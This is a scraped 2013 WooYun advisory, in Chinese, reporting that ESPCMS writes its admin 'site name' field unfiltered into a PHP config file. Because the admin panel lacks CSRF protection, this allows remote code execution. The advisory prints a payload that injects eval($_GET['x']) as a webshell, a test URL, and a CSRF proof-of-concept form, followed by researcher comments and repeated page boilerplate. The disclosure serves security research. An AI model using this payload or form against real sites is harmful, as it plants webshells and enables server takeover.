代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行 | WooYun-2013-38391

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2013-38391

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

漏洞作者： LaiX

提交时间： 2013-09-28 11:39

公开时间： 2013-12-24 11:40

漏洞类型： CSRF

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： php源码审核任意文件写入利用 php 敏感文件操作参数未加过滤

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-28：细节已通知厂商并且等待厂商处理中
2013-10-08：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2013-12-02：细节向核心白帽子及相关领域专家公开
2013-12-12：细节向普通白帽子公开
2013-12-22：细节向实习白帽子公开
2013-12-24：细节向公众公开

简要描述：

暂无

详细说明：

这是一个后台GETSHELL的漏洞，但是由于该程序没有对CSRF进行防御，所以可以导致CSRF直接GETshell，并且加重危害

漏洞证明：

问题页面：后台-系统设置-网站基本参数设置

对输入的数据并没有进行太过严格的过滤可以导致直接写入恶意PHP代码进配置文件

这里我们来测试一下'网站名称'这一项。

我们构造：

code 区域

',//hello

保存之后，我们来看看(command.php)

然后我们进一步构造：

code 区域

',);eval($_GET['x']);$CONFIG=Array(//

保存之后，我们来看看(command.php)

看起来没问题，我们试着访问

code 区域

**.**.**.**:8080/espcms/datacache/command.php?x=phpinfo();

接下来给出CSRF的测试代码

code 区域

<form id='test_form' action='**.**.**.**:8080/espcms/adminsoft/index.php?archive=management&action=setsave' method='POST' >


   <input type='hidden' name='sitename' value='getshell啦' >


   <input type='submit' name='submit' value='submit' >


</form>

修复方案：

过滤严格一点吧

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-12-24 11:40

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2013-10-09 20:35 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
0

靠都已经自动忽略了赶紧来认领啊，不行！！求补偿！！

1# 回复此人
2013-10-10 10:18 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
0

@LaiX 同情一下

2# 回复此人
2013-10-12 09:17 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
0

@wefgod 感觉不会再爱了

3# 回复此人
2013-10-12 09:18 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
0

@LaiX 辛苦了！

4# 回复此人
2013-10-25 15:11 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
0

这个好像还不错啊

5# 回复此人
2013-12-15 18:49 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )
0

骚年为什么不考虑gpc

6# 回复此人
2013-12-24 18:57 | LaiX ( 普通白帽子 | Rank:130 漏洞数:40 | SAINTSEC)
0

@neal 你是来关注安全的，还是来反驳我达到装逼目的的。不管有没有开，并不代表漏洞不存在。

7# 回复此人
2014-07-17 20:33 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank，最后发现是我想太多了。...)
0

@LaiX 大牛可以把这句话改为签名了你是来关注安全的，还是来反驳我达到装逼目的的。不管有没有开，并不代表漏洞不存在。

8# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2013-38391

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商：易思ESPCMS企业网站管理系统

漏洞作者： LaiX

提交时间： 2013-09-28 11:39

公开时间： 2013-12-24 11:40

漏洞类型： CSRF

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： php源码审核任意文件写入利用 php 敏感文件操作参数未加过滤

2人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(9) 关注此漏洞

缺陷编号： WooYun-2013-38391

漏洞标题： 代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商： 易思ESPCMS企业网站管理系统

漏洞作者： LaiX

提交时间： 2013-09-28 11:39

公开时间： 2013-12-24 11:40

漏洞类型： CSRF

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： php源码审核 任意文件写入利用 php 敏感文件操作参数未加过滤

2人收藏 收藏 var token=""; var id="38391"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(9) 关注此漏洞

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商：易思ESPCMS企业网站管理系统

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： php源码审核任意文件写入利用 php 敏感文件操作参数未加过滤

2人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分